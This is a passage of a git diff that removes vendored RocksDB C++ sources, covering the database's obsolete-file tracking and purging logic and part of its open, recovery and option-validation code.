-        job_context.Clean();
-        return Status::InvalidArgument("PromoteL0 called during L0 compaction");
-      }
-
-      if (i == 0) continue;
-      auto prev_f = l0_files[i - 1];
-      if (icmp->Compare(prev_f->largest, f->smallest) >= 0) {
-        ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                       "PromoteL0 FAILED. Files %" PRIu64 " and %" PRIu64
-                       " have overlapping ranges\n",
-                       prev_f->fd.GetNumber(), f->fd.GetNumber());
-        job_context.Clean();
-        return Status::InvalidArgument("L0 has overlapping files");
-      }
-    }
-
-    // Check that all levels up to target_level are empty.
-    for (int level = 1; level <= target_level; ++level) {
-      if (vstorage->NumLevelFiles(level) > 0) {
-        ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                       "PromoteL0 FAILED. Level %d not empty\n", level);
-        job_context.Clean();
-        return Status::InvalidArgument(
-            "All levels up to target_level "
-            "must be empty");
-      }
-    }
-
-    edit.SetColumnFamily(cfd->GetID());
-    for (const auto& f : l0_files) {
-      edit.DeleteFile(0, f->fd.GetNumber());
-      edit.AddFile(target_level, f->fd.GetNumber(), f->fd.GetPathId(),
-                   f->fd.GetFileSize(), f->smallest, f->largest,
-                   f->smallest_seqno, f->largest_seqno,
-                   f->marked_for_compaction);
-    }
-
-    status = versions_->LogAndApply(cfd, *cfd->GetLatestMutableCFOptions(),
-                                    &edit, &mutex_, directories_.GetDbDir());
-    if (status.ok()) {
-      InstallSuperVersionAndScheduleWorkWrapper(
-          cfd, &job_context, *cfd->GetLatestMutableCFOptions());
-    }
-  }  // lock released here
-  LogFlush(immutable_db_options_.info_log);
-  job_context.Clean();
-
-  return status;
-}
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_impl_files.cc b/thirdparty/rocksdb/db/db_impl_files.cc
deleted file mode 100644
index e44e423..0000000
--- a/thirdparty/rocksdb/db/db_impl_files.cc
+++ /dev/null
@@ -1,548 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/db_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-#include <inttypes.h>
-#include "db/event_helpers.h"
-#include "util/file_util.h"
-#include "util/sst_file_manager_impl.h"
-
-
-namespace rocksdb {
-uint64_t DBImpl::FindMinPrepLogReferencedByMemTable() {
-  if (!allow_2pc()) {
-    return 0;
-  }
-
-  uint64_t min_log = 0;
-
-  // we must look through the memtables for two phase transactions
-  // that have been committed but not yet flushed
-  for (auto loop_cfd : *versions_->GetColumnFamilySet()) {
-    if (loop_cfd->IsDropped()) {
-      continue;
-    }
-
-    auto log = loop_cfd->imm()->GetMinLogContainingPrepSection();
-
-    if (log > 0 && (min_log == 0 || log < min_log)) {
-      min_log = log;
-    }
-
-    log = loop_cfd->mem()->GetMinLogContainingPrepSection();
-
-    if (log > 0 && (min_log == 0 || log < min_log)) {
-      min_log = log;
-    }
-  }
-
-  return min_log;
-}
-
-void DBImpl::MarkLogAsHavingPrepSectionFlushed(uint64_t log) {
-  assert(log != 0);
-  std::lock_guard<std::mutex> lock(prep_heap_mutex_);
-  auto it = prepared_section_completed_.find(log);
-  assert(it != prepared_section_completed_.end());
-  it->second += 1;
-}
-
-void DBImpl::MarkLogAsContainingPrepSection(uint64_t log) {
-  assert(log != 0);
-  std::lock_guard<std::mutex> lock(prep_heap_mutex_);
-  min_log_with_prep_.push(log);
-  auto it = prepared_section_completed_.find(log);
-  if (it == prepared_section_completed_.end()) {
-    prepared_section_completed_[log] = 0;
-  }
-}
-
-uint64_t DBImpl::FindMinLogContainingOutstandingPrep() {
-
-  if (!allow_2pc()) {
-    return 0;
-  }
-
-  std::lock_guard<std::mutex> lock(prep_heap_mutex_);
-  uint64_t min_log = 0;
-
-  // first we look in the prepared heap where we keep
-  // track of transactions that have been prepared (written to WAL)
-  // but not yet committed.
-  while (!min_log_with_prep_.empty()) {
-    min_log = min_log_with_prep_.top();
-
-    auto it = prepared_section_completed_.find(min_log);
-
-    // value was marked as 'deleted' from heap
-    if (it != prepared_section_completed_.end() && it->second > 0) {
-      it->second -= 1;
-      min_log_with_prep_.pop();
-
-      // back to squere one...
-      min_log = 0;
-      continue;
-    } else {
-      // found a valid value
-      break;
-    }
-  }
-
-  return min_log;
-}
-
-uint64_t DBImpl::MinLogNumberToKeep() {
-  uint64_t log_number = versions_->MinLogNumber();
-
-  if (allow_2pc()) {
-    // if are 2pc we must consider logs containing prepared
-    // sections of outstanding transactions.
-    //
-    // We must check min logs with outstanding prep before we check
-    // logs referneces by memtables because a log referenced by the
-    // first data structure could transition to the second under us.
-    //
-    // TODO(horuff): iterating over all column families under db mutex.
-    // should find more optimial solution
-    auto min_log_in_prep_heap = FindMinLogContainingOutstandingPrep();
-
-    if (min_log_in_prep_heap != 0 && min_log_in_prep_heap < log_number) {
-      log_number = min_log_in_prep_heap;
-    }
-
-    auto min_log_refed_by_mem = FindMinPrepLogReferencedByMemTable();
-
-    if (min_log_refed_by_mem != 0 && min_log_refed_by_mem < log_number) {
-      log_number = min_log_refed_by_mem;
-    }
-  }
-  return log_number;
-}
-
-// * Returns the list of live files in 'sst_live'
-// If it's doing full scan:
-// * Returns the list of all files in the filesystem in
-// 'full_scan_candidate_files'.
-// Otherwise, gets obsolete files from VersionSet.
-// no_full_scan = true -- never do the full scan using GetChildren()
-// force = false -- don't force the full scan, except every
-//  mutable_db_options_.delete_obsolete_files_period_micros
-// force = true -- force the full scan
-void DBImpl::FindObsoleteFiles(JobContext* job_context, bool force,
-                               bool no_full_scan) {
-  mutex_.AssertHeld();
-
-  // if deletion is disabled, do nothing
-  if (disable_delete_obsolete_files_ > 0) {
-    return;
-  }
-
-  bool doing_the_full_scan = false;
-
-  // logic for figurint out if we're doing the full scan
-  if (no_full_scan) {
-    doing_the_full_scan = false;
-  } else if (force ||
-             mutable_db_options_.delete_obsolete_files_period_micros == 0) {
-    doing_the_full_scan = true;
-  } else {
-    const uint64_t now_micros = env_->NowMicros();
-    if ((delete_obsolete_files_last_run_ +
-         mutable_db_options_.delete_obsolete_files_period_micros) <
-        now_micros) {
-      doing_the_full_scan = true;
-      delete_obsolete_files_last_run_ = now_micros;
-    }
-  }
-
-  // don't delete files that might be currently written to from compaction
-  // threads
-  // Since job_context->min_pending_output is set, until file scan finishes,
-  // mutex_ cannot be released. Otherwise, we might see no min_pending_output
-  // here but later find newer generated unfinalized files while scannint.
-  if (!pending_outputs_.empty()) {
-    job_context->min_pending_output = *pending_outputs_.begin();
-  } else {
-    // delete all of them
-    job_context->min_pending_output = std::numeric_limits<uint64_t>::max();
-  }
-
-  // Get obsolete files.  This function will also update the list of
-  // pending files in VersionSet().
-  versions_->GetObsoleteFiles(&job_context->sst_delete_files,
-                              &job_context->manifest_delete_files,
-                              job_context->min_pending_output);
-
-  // store the current filenum, lognum, etc
-  job_context->manifest_file_number = versions_->manifest_file_number();
-  job_context->pending_manifest_file_number =
-      versions_->pending_manifest_file_number();
-  job_context->log_number = MinLogNumberToKeep();
-
-  job_context->prev_log_number = versions_->prev_log_number();
-
-  versions_->AddLiveFiles(&job_context->sst_live);
-  if (doing_the_full_scan) {
-    for (size_t path_id = 0; path_id < immutable_db_options_.db_paths.size();
-         path_id++) {
-      // set of all files in the directory. We'll exclude files that are still
-      // alive in the subsequent processings.
-      std::vector<std::string> files;
-      env_->GetChildren(immutable_db_options_.db_paths[path_id].path,
-                        &files);  // Ignore errors
-      for (std::string file : files) {
-        // TODO(icanadi) clean up this mess to avoid having one-off "/" prefixes
-        job_context->full_scan_candidate_files.emplace_back(
-            "/" + file, static_cast<uint32_t>(path_id));
-      }
-    }
-
-    // Add log files in wal_dir
-    if (immutable_db_options_.wal_dir != dbname_) {
-      std::vector<std::string> log_files;
-      env_->GetChildren(immutable_db_options_.wal_dir,
-                        &log_files);  // Ignore errors
-      for (std::string log_file : log_files) {
-        job_context->full_scan_candidate_files.emplace_back(log_file, 0);
-      }
-    }
-    // Add info log files in db_log_dir
-    if (!immutable_db_options_.db_log_dir.empty() &&
-        immutable_db_options_.db_log_dir != dbname_) {
-      std::vector<std::string> info_log_files;
-      // Ignore errors
-      env_->GetChildren(immutable_db_options_.db_log_dir, &info_log_files);
-      for (std::string log_file : info_log_files) {
-        job_context->full_scan_candidate_files.emplace_back(log_file, 0);
-      }
-    }
-  }
-
-  // logs_ is empty when called during recovery, in which case there can't yet
-  // be any tracked obsolete logs
-  if (!alive_log_files_.empty() && !logs_.empty()) {
-    uint64_t min_log_number = job_context->log_number;
-    size_t num_alive_log_files = alive_log_files_.size();
-    // find newly obsoleted log files
-    while (alive_log_files_.begin()->number < min_log_number) {
-      auto& earliest = *alive_log_files_.begin();
-      if (immutable_db_options_.recycle_log_file_num >
-          log_recycle_files.size()) {
-        ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                       "adding log %" PRIu64 " to recycle list\n",
-                       earliest.number);
-        log_recycle_files.push_back(earliest.number);
-      } else {
-        job_context->log_delete_files.push_back(earliest.number);
-      }
-      if (job_context->size_log_to_delete == 0) {
-        job_context->prev_total_log_size = total_log_size_;
-        job_context->num_alive_log_files = num_alive_log_files;
-      }
-      job_context->size_log_to_delete += earliest.size;
-      total_log_size_ -= earliest.size;
-      if (concurrent_prepare_) {
-        log_write_mutex_.Lock();
-      }
-      alive_log_files_.pop_front();
-      if (concurrent_prepare_) {
-        log_write_mutex_.Unlock();
-      }
-      // Current log should always stay alive since it can't have
-      // number < MinLogNumber().
-      assert(alive_log_files_.size());
-    }
-    while (!logs_.empty() && logs_.front().number < min_log_number) {
-      auto& log = logs_.front();
-      if (log.getting_synced) {
-        log_sync_cv_.Wait();
-        // logs_ could have changed while we were waiting.
-        continue;
-      }
-      logs_to_free_.push_back(log.ReleaseWriter());
-      {
-        InstrumentedMutexLock wl(&log_write_mutex_);
-        logs_.pop_front();
-      }
-    }
-    // Current log cannot be obsolete.
-    assert(!logs_.empty());
-  }
-
-  // We're just cleaning up for DB::Write().
-  assert(job_context->logs_to_free.empty());
-  job_context->logs_to_free = logs_to_free_;
-  job_context->log_recycle_files.assign(log_recycle_files.begin(),
-                                        log_recycle_files.end());
-  logs_to_free_.clear();
-}
-
-namespace {
-bool CompareCandidateFile(const JobContext::CandidateFileInfo& first,
-                          const JobContext::CandidateFileInfo& second) {
-  if (first.file_name > second.file_name) {
-    return true;
-  } else if (first.file_name < second.file_name) {
-    return false;
-  } else {
-    return (first.path_id > second.path_id);
-  }
-}
-};  // namespace
-
-// Delete obsolete files and log status and information of file deletion
-void DBImpl::DeleteObsoleteFileImpl(Status file_deletion_status, int job_id,
-                                    const std::string& fname, FileType type,
-                                    uint64_t number, uint32_t path_id) {
-  if (type == kTableFile) {
-    file_deletion_status =
-        DeleteSSTFile(&immutable_db_options_, fname, path_id);
-  } else {
-    file_deletion_status = env_->DeleteFile(fname);
-  }
-  if (file_deletion_status.ok()) {
-    ROCKS_LOG_DEBUG(immutable_db_options_.info_log,
-                    "[JOB %d] Delete %s type=%d #%" PRIu64 " -- %s\n", job_id,
-                    fname.c_str(), type, number,
-                    file_deletion_status.ToString().c_str());
-  } else if (env_->FileExists(fname).IsNotFound()) {
-    ROCKS_LOG_INFO(
-        immutable_db_options_.info_log,
-        "[JOB %d] Tried to delete a non-existing file %s type=%d #%" PRIu64
-        " -- %s\n",
-        job_id, fname.c_str(), type, number,
-        file_deletion_status.ToString().c_str());
-  } else {
-    ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                    "[JOB %d] Failed to delete %s type=%d #%" PRIu64 " -- %s\n",
-                    job_id, fname.c_str(), type, number,
-                    file_deletion_status.ToString().c_str());
-  }
-  if (type == kTableFile) {
-    EventHelpers::LogAndNotifyTableFileDeletion(
-        &event_logger_, job_id, number, fname, file_deletion_status, GetName(),
-        immutable_db_options_.listeners);
-  }
-}
-
-// Diffs the files listed in filenames and those that do not
-// belong to live files are posibly removed. Also, removes all the
-// files in sst_delete_files and log_delete_files.
-// It is not necessary to hold the mutex when invoking this method.
-void DBImpl::PurgeObsoleteFiles(const JobContext& state, bool schedule_only) {
-  // we'd better have sth to delete
-  assert(state.HaveSomethingToDelete());
-
-  // this checks if FindObsoleteFiles() was run before. If not, don't do
-  // PurgeObsoleteFiles(). If FindObsoleteFiles() was run, we need to also
-  // run PurgeObsoleteFiles(), even if disable_delete_obsolete_files_ is true
-  if (state.manifest_file_number == 0) {
-    return;
-  }
-
-  // Now, convert live list to an unordered map, WITHOUT mutex held;
-  // set is slow.
-  std::unordered_map<uint64_t, const FileDescriptor*> sst_live_map;
-  for (const FileDescriptor& fd : state.sst_live) {
-    sst_live_map[fd.GetNumber()] = &fd;
-  }
-  std::unordered_set<uint64_t> log_recycle_files_set(
-      state.log_recycle_files.begin(), state.log_recycle_files.end());
-
-  auto candidate_files = state.full_scan_candidate_files;
-  candidate_files.reserve(
-      candidate_files.size() + state.sst_delete_files.size() +
-      state.log_delete_files.size() + state.manifest_delete_files.size());
-  // We may ignore the dbname when generating the file names.
-  const char* kDumbDbName = "";
-  for (auto file : state.sst_delete_files) {
-    candidate_files.emplace_back(
-        MakeTableFileName(kDumbDbName, file->fd.GetNumber()),
-        file->fd.GetPathId());
-    if (file->table_reader_handle) {
-      table_cache_->Release(file->table_reader_handle);
-    }
-    delete file;
-  }
-
-  for (auto file_num : state.log_delete_files) {
-    if (file_num > 0) {
-      candidate_files.emplace_back(LogFileName(kDumbDbName, file_num), 0);
-    }
-  }
-  for (const auto& filename : state.manifest_delete_files) {
-    candidate_files.emplace_back(filename, 0);
-  }
-
-  // dedup state.candidate_files so we don't try to delete the same
-  // file twice
-  std::sort(candidate_files.begin(), candidate_files.end(),
-            CompareCandidateFile);
-  candidate_files.erase(
-      std::unique(candidate_files.begin(), candidate_files.end()),
-      candidate_files.end());
-
-  if (state.prev_total_log_size > 0) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                   "[JOB %d] Try to delete WAL files size %" PRIu64
-                   ", prev total WAL file size %" PRIu64
-                   ", number of live WAL files %" ROCKSDB_PRIszt ".\n",
-                   state.job_id, state.size_log_to_delete,
-                   state.prev_total_log_size, state.num_alive_log_files);
-  }
-
-  std::vector<std::string> old_info_log_files;
-  InfoLogPrefix info_log_prefix(!immutable_db_options_.db_log_dir.empty(),
-                                dbname_);
-  for (const auto& candidate_file : candidate_files) {
-    std::string to_delete = candidate_file.file_name;
-    uint32_t path_id = candidate_file.path_id;
-    uint64_t number;
-    FileType type;
-    // Ignore file if we cannot recognize it.
-    if (!ParseFileName(to_delete, &number, info_log_prefix.prefix, &type)) {
-      continue;
-    }
-
-    bool keep = true;
-    switch (type) {
-      case kLogFile:
-        keep = ((number >= state.log_number) ||
-                (number == state.prev_log_number) ||
-                (log_recycle_files_set.find(number) !=
-                 log_recycle_files_set.end()));
-        break;
-      case kDescriptorFile:
-        // Keep my manifest file, and any newer incarnations'
-        // (can happen during manifest roll)
-        keep = (number >= state.manifest_file_number);
-        break;
-      case kTableFile:
-        // If the second condition is not there, this makes
-        // DontDeletePendingOutputs fail
-        keep = (sst_live_map.find(number) != sst_live_map.end()) ||
-               number >= state.min_pending_output;
-        break;
-      case kTempFile:
-        // Any temp files that are currently being written to must
-        // be recorded in pending_outputs_, which is inserted into "live".
-        // Also, SetCurrentFile creates a temp file when writing out new
-        // manifest, which is equal to state.pending_manifest_file_number. We
-        // should not delete that file
-        //
-        // TODO(yhchiang): carefully modify the third condition to safely
-        //                 remove the temp options files.
-        keep = (sst_live_map.find(number) != sst_live_map.end()) ||
-               (number == state.pending_manifest_file_number) ||
-               (to_delete.find(kOptionsFileNamePrefix) != std::string::npos);
-        break;
-      case kInfoLogFile:
-        keep = true;
-        if (number != 0) {
-          old_info_log_files.push_back(to_delete);
-        }
-        break;
-      case kCurrentFile:
-      case kDBLockFile:
-      case kIdentityFile:
-      case kMetaDatabase:
-      case kOptionsFile:
-      case kBlobFile:
-        keep = true;
-        break;
-    }
-
-    if (keep) {
-      continue;
-    }
-
-    std::string fname;
-    if (type == kTableFile) {
-      // evict from cache
-      TableCache::Evict(table_cache_.get(), number);
-      fname = TableFileName(immutable_db_options_.db_paths, number, path_id);
-    } else {
-      fname = ((type == kLogFile) ? immutable_db_options_.wal_dir : dbname_) +
-              "/" + to_delete;
-    }
-
-#ifndef ROCKSDB_LITE
-    if (type == kLogFile && (immutable_db_options_.wal_ttl_seconds > 0 ||
-                             immutable_db_options_.wal_size_limit_mb > 0)) {
-      wal_manager_.ArchiveWALFile(fname, number);
-      continue;
-    }
-#endif  // !ROCKSDB_LITE
-
-    Status file_deletion_status;
-    if (schedule_only) {
-      InstrumentedMutexLock guard_lock(&mutex_);
-      SchedulePendingPurge(fname, type, number, path_id, state.job_id);
-    } else {
-      DeleteObsoleteFileImpl(file_deletion_status, state.job_id, fname, type,
-                             number, path_id);
-    }
-  }
-
-  // Delete old info log files.
-  size_t old_info_log_file_count = old_info_log_files.size();
-  if (old_info_log_file_count != 0 &&
-      old_info_log_file_count >= immutable_db_options_.keep_log_file_num) {
-    std::sort(old_info_log_files.begin(), old_info_log_files.end());
-    size_t end =
-        old_info_log_file_count - immutable_db_options_.keep_log_file_num;
-    for (unsigned int i = 0; i <= end; i++) {
-      std::string& to_delete = old_info_log_files.at(i);
-      std::string full_path_to_delete =
-          (immutable_db_options_.db_log_dir.empty()
-               ? dbname_
-               : immutable_db_options_.db_log_dir) +
-          "/" + to_delete;
-      ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                     "[JOB %d] Delete info log file %s\n", state.job_id,
-                     full_path_to_delete.c_str());
-      Status s = env_->DeleteFile(full_path_to_delete);
-      if (!s.ok()) {
-        if (env_->FileExists(full_path_to_delete).IsNotFound()) {
-          ROCKS_LOG_INFO(
-              immutable_db_options_.info_log,
-              "[JOB %d] Tried to delete non-existing info log file %s FAILED "
-              "-- %s\n",
-              state.job_id, to_delete.c_str(), s.ToString().c_str());
-        } else {
-          ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                          "[JOB %d] Delete info log file %s FAILED -- %s\n",
-                          state.job_id, to_delete.c_str(),
-                          s.ToString().c_str());
-        }
-      }
-    }
-  }
-#ifndef ROCKSDB_LITE
-  wal_manager_.PurgeObsoleteWALFiles();
-#endif  // ROCKSDB_LITE
-  LogFlush(immutable_db_options_.info_log);
-}
-
-void DBImpl::DeleteObsoleteFiles() {
-  mutex_.AssertHeld();
-  JobContext job_context(next_job_id_.fetch_add(1));
-  FindObsoleteFiles(&job_context, true);
-
-  mutex_.Unlock();
-  if (job_context.HaveSomethingToDelete()) {
-    PurgeObsoleteFiles(job_context);
-  }
-  job_context.Clean();
-  mutex_.Lock();
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_impl_open.cc b/thirdparty/rocksdb/db/db_impl_open.cc
deleted file mode 100644
index bc94b60..0000000
--- a/thirdparty/rocksdb/db/db_impl_open.cc
+++ /dev/null
@@ -1,1129 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/db_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-#include <inttypes.h>
-
-#include "db/builder.h"
-#include "options/options_helper.h"
-#include "rocksdb/wal_filter.h"
-#include "table/block_based_table_factory.h"
-#include "util/rate_limiter.h"
-#include "util/sst_file_manager_impl.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-Options SanitizeOptions(const std::string& dbname,
-                        const Options& src) {
-  auto db_options = SanitizeOptions(dbname, DBOptions(src));
-  ImmutableDBOptions immutable_db_options(db_options);
-  auto cf_options =
-      SanitizeOptions(immutable_db_options, ColumnFamilyOptions(src));
-  return Options(db_options, cf_options);
-}
-
-DBOptions SanitizeOptions(const std::string& dbname, const DBOptions& src) {
-  DBOptions result(src);
-
-  // result.max_open_files means an "infinite" open files.
-  if (result.max_open_files != -1) {
-    int max_max_open_files = port::GetMaxOpenFiles();
-    if (max_max_open_files == -1) {
-      max_max_open_files = 0x400000;
-    }
-    ClipToRange(&result.max_open_files, 20, max_max_open_files);
-  }
-
-  if (result.info_log == nullptr) {
-    Status s = CreateLoggerFromOptions(dbname, result, &result.info_log);
-    if (!s.ok()) {
-      // No place suitable for logging
-      result.info_log = nullptr;
-    }
-  }
-
-  if (!result.write_buffer_manager) {
-    result.write_buffer_manager.reset(
-        new WriteBufferManager(result.db_write_buffer_size));
-  }
-  auto bg_job_limits = DBImpl::GetBGJobLimits(result.max_background_flushes,
-                                              result.max_background_compactions,
-                                              result.max_background_jobs,
-                                              true /* parallelize_compactions */);
-  result.env->IncBackgroundThreadsIfNeeded(bg_job_limits.max_compactions,
-                                           Env::Priority::LOW);
-  result.env->IncBackgroundThreadsIfNeeded(bg_job_limits.max_flushes,
-                                           Env::Priority::HIGH);
-
-  if (result.rate_limiter.get() != nullptr) {
-    if (result.bytes_per_sync == 0) {
-      result.bytes_per_sync = 1024 * 1024;
-    }
-  }
-
-  if (result.delayed_write_rate == 0) {
-    if (result.rate_limiter.get() != nullptr) {
-      result.delayed_write_rate = result.rate_limiter->GetBytesPerSecond();
-    }
-    if (result.delayed_write_rate == 0) {
-      result.delayed_write_rate = 16 * 1024 * 1024;
-    }
-  }
-
-  if (result.WAL_ttl_seconds > 0 || result.WAL_size_limit_MB > 0) {
-    result.recycle_log_file_num = false;
-  }
-
-  if (result.recycle_log_file_num &&
-      (result.wal_recovery_mode == WALRecoveryMode::kPointInTimeRecovery ||
-       result.wal_recovery_mode == WALRecoveryMode::kAbsoluteConsistency)) {
-    // kPointInTimeRecovery is indistinguishable from
-    // kTolerateCorruptedTailRecords in recycle mode since we define
-    // the "end" of the log as the first corrupt record we encounter.
-    // kAbsoluteConsistency doesn't make sense because even a clean
-    // shutdown leaves old junk at the end of the log file.
-    result.wal_recovery_mode = WALRecoveryMode::kTolerateCorruptedTailRecords;
-  }
-
-  if (result.wal_dir.empty()) {
-    // Use dbname as default
-    result.wal_dir = dbname;
-  }
-  if (result.wal_dir.back() == '/') {
-    result.wal_dir = result.wal_dir.substr(0, result.wal_dir.size() - 1);
-  }
-
-  if (result.db_paths.size() == 0) {
-    result.db_paths.emplace_back(dbname, std::numeric_limits<uint64_t>::max());
-  }
-
-  if (result.use_direct_io_for_flush_and_compaction &&
-      result.compaction_readahead_size == 0) {
-    TEST_SYNC_POINT_CALLBACK("SanitizeOptions:direct_io", nullptr);
-    result.compaction_readahead_size = 1024 * 1024 * 2;
-  }
-
-  if (result.compaction_readahead_size > 0 ||
-      result.use_direct_io_for_flush_and_compaction) {
-    result.new_table_reader_for_compaction_inputs = true;
-  }
-
-  // Force flush on DB open if 2PC is enabled, since with 2PC we have no
-  // guarantee that consecutive log files have consecutive sequence id, which
-  // make recovery complicated.
-  if (result.allow_2pc) {
-    result.avoid_flush_during_recovery = false;
-  }
-
-  return result;
-}
-
-namespace {
-
-Status SanitizeOptionsByTable(
-    const DBOptions& db_opts,
-    const std::vector<ColumnFamilyDescriptor>& column_families) {
-  Status s;
-  for (auto cf : column_families) {
-    s = cf.options.table_factory->SanitizeOptions(db_opts, cf.options);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-  return Status::OK();
-}
-
-static Status ValidateOptions(
-    const DBOptions& db_options,
-    const std::vector<ColumnFamilyDescriptor>& column_families) {
-  Status s;
-
-  for (auto& cfd : column_families) {
-    s = CheckCompressionSupported(cfd.options);
-    if (s.ok() && db_options.allow_concurrent_memtable_write) {
-      s = CheckConcurrentWritesSupported(cfd.options);
-    }
-    if (!s.ok()) {
-      return s;
-    }
-    if (db_options.db_paths.size() > 1) {
-      if ((cfd.options.compaction_style != kCompactionStyleUniversal) &&
-          (cfd.options.compaction_style != kCompactionStyleLevel)) {
-        return Status::NotSupported(
-            "More than one DB paths are only supported in "
-            "universal and level compaction styles. ");
-      }
-    }
-    if (cfd.options.compaction_options_fifo.ttl > 0) {
-      if (db_options.max_open_files != -1) {
-        return Status::NotSupported(
-            "FIFO Compaction with TTL is only supported when files are always "
-            "kept open (set max_open_files = -1). ");
-      }
-      if (cfd.options.table_factory->Name() !=
-          BlockBasedTableFactory().Name()) {
-        return Status::NotSupported(
-            "FIFO Compaction with TTL is only supported in "
-            "Block-Based Table format. ");
-      }
-    }
-  }
-
-  if (db_options.db_paths.size() > 4) {
-    return Status::NotSupported(
-        "More than four DB paths are not supported yet. ");
-  }
-
-  if (db_options.allow_mmap_reads && db_options.use_direct_reads) {
-    // Protect against assert in PosixMMapReadableFile constructor
-    return Status::NotSupported(
-        "If memory mapped reads (allow_mmap_reads) are enabled "
-        "then direct I/O reads (use_direct_reads) must be disabled. ");
-  }
-
-  if (db_options.allow_mmap_writes &&
-      db_options.use_direct_io_for_flush_and_compaction) {
-    return Status::NotSupported(
-        "If memory mapped writes (allow_mmap_writes) are enabled "
-        "then direct I/O writes (use_direct_io_for_flush_and_compaction) must "
-        "be disabled. ");
-  }
-
-  if (db_options.keep_log_file_num == 0) {
-    return Status::InvalidArgument("keep_log_file_num must be greater than 0");
-  }
-
-  return Status::OK();
-}
-} // namespace
-Status DBImpl::NewDB() {
-  VersionEdit new_db;
-  new_db.SetLogNumber(0);
-  new_db.SetNextFile(2);
-  new_db.SetLastSequence(0);
-
-  Status s;
-
-  ROCKS_LOG_INFO(immutable_db_options_.info_log, "Creating manifest 1 \n");
-  const std::string manifest = DescriptorFileName(dbname_, 1);
-  {
-    unique_ptr<WritableFile> file;
-    EnvOptions env_options = env_->OptimizeForManifestWrite(env_options_);
-    s = NewWritableFile(env_, manifest, &file, env_options);
-    if (!s.ok()) {
-      return s;
-    }
-    file->SetPreallocationBlockSize(
-        immutable_db_options_.manifest_preallocation_size);
-    unique_ptr<WritableFileWriter> file_writer(
-        new WritableFileWriter(std::move(file), env_options));
-    log::Writer log(std::move(file_writer), 0, false);
-    std::string record;
-    new_db.EncodeTo(&record);
-    s = log.AddRecord(record);
-    if (s.ok()) {
-      s = SyncManifest(env_, &immutable_db_options_, log.file());
-    }
-  }
-  if (s.ok()) {
-    // Make "CURRENT" file that points to the new manifest file.
-    s = SetCurrentFile(env_, dbname_, 1, directories_.GetDbDir());
-  } else {
-    env_->DeleteFile(manifest);
-  }
-  return s;
-}
-
-Status DBImpl::Directories::CreateAndNewDirectory(
-    Env* env, const std::string& dirname,
-    std::unique_ptr<Directory>* directory) const {
-  // We call CreateDirIfMissing() as the directory may already exist (if we
-  // are reopening a DB), when this happens we don't want creating the
-  // directory to cause an error. However, we need to check if creating the
-  // directory fails or else we may get an obscure message about the lock
-  // file not existing. One real-world example of this occurring is if
-  // env->CreateDirIfMissing() doesn't create intermediate directories, e.g.
-  // when dbname_ is "dir/db" but when "dir" doesn't exist.
-  Status s = env->CreateDirIfMissing(dirname);
-  if (!s.ok()) {
-    return s;
-  }
-  return env->NewDirectory(dirname, directory);
-}
-
-Status DBImpl::Directories::SetDirectories(
-    Env* env, const std::string& dbname, const std::string& wal_dir,
-    const std::vector<DbPath>& data_paths) {
-  Status s = CreateAndNewDirectory(env, dbname, &db_dir_);
-  if (!s.ok()) {
-    return s;
-  }
-  if (!wal_dir.empty() && dbname != wal_dir) {
-    s = CreateAndNewDirectory(env, wal_dir, &wal_dir_);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-
-  data_dirs_.clear();
-  for (auto& p : data_paths) {
-    const std::string db_path = p.path;
-    if (db_path == dbname) {
-      data_dirs_.emplace_back(nullptr);
-    } else {
-      std::unique_ptr<Directory> path_directory;
-      s = CreateAndNewDirectory(env, db_path, &path_directory);
-      if (!s.ok()) {
-        return s;
-      }
-      data_dirs_.emplace_back(path_directory.release());
-    }
-  }
-  assert(data_dirs_.size() == data_paths.size());
-  return Status::OK();
-}
-
-Status DBImpl::Recover(
-    const std::vector<ColumnFamilyDescriptor>& column_families, bool read_only,
-    bool error_if_log_file_exist, bool error_if_data_exists_in_logs) {
-  mutex_.AssertHeld();
-
-  bool is_new_db = false;
-  assert(db_lock_ == nullptr);
-  if (!read_only) {
-    Status s = directories_.SetDirectories(env_, dbname_,
-                                           immutable_db_options_.wal_dir,
-                                           immutable_db_options_.db_paths);
-    if (!s.ok()) {
-      return s;
-    }
-
-    s = env_->LockFile(LockFileName(dbname_), &db_lock_);
-    if (!s.ok()) {
-      return s;
-    }
-
-    s = env_->FileExists(CurrentFileName(dbname_));
-    if (s.IsNotFound()) {
-      if (immutable_db_options_.create_if_missing) {
-        s = NewDB();
-        is_new_db = true;
-        if (!s.ok()) {
-          return s;
-        }
-      } else {
-        return Status::InvalidArgument(
-            dbname_, "does not exist (create_if_missing is false)");
-      }
-    } else if (s.ok()) {
-      if (immutable_db_options_.error_if_exists) {
-        return Status::InvalidArgument(
-            dbname_, "exists (error_if_exists is true)");
-      }
-    } else {
-      // Unexpected error reading file
-      assert(s.IsIOError());
-      return s;
-    }
-    // Check for the IDENTITY file and create it if not there
-    s = env_->FileExists(IdentityFileName(dbname_));
-    if (s.IsNotFound()) {
-      s = SetIdentityFile(env_, dbname_);
-      if (!s.ok()) {
